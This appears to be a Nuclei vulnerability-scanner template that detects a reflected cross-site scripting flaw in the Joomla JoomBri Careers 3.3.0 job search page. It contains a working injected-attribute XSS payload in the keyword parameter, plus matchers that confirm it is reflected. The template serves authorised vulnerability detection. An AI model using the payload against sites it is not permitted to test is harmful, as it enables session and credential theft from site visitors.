id: joomla-joombri-careers-xss

info:
  name: Joomla JoomBri Careers 3.3.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://packetstormsecurity.com/files/168641/Joomla-JoomBri-Careers-3.3.0-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2022100024
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
  tags: packetstorm,xss,joomla,joombri

http:
  - method: GET
    path:
      - "{{BaseURL}}/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3D%22alert(document.domain)%22autofocus%3D%22ak5aghi5u9p"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "alert(document.domain)") && contains(body, "Joomla") && contains(tolower(body), "joombri")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and

# digest: 4a0a00473045022100f381de363d9c6b1a570d28b77951ccf1cfda140c5bf35f619e408135833d4b44022074d446e1211a77833e50da5d777098f9bded28d13cf5dea72733e0427051478c:922c64590222798bb761d5b6d8e72950
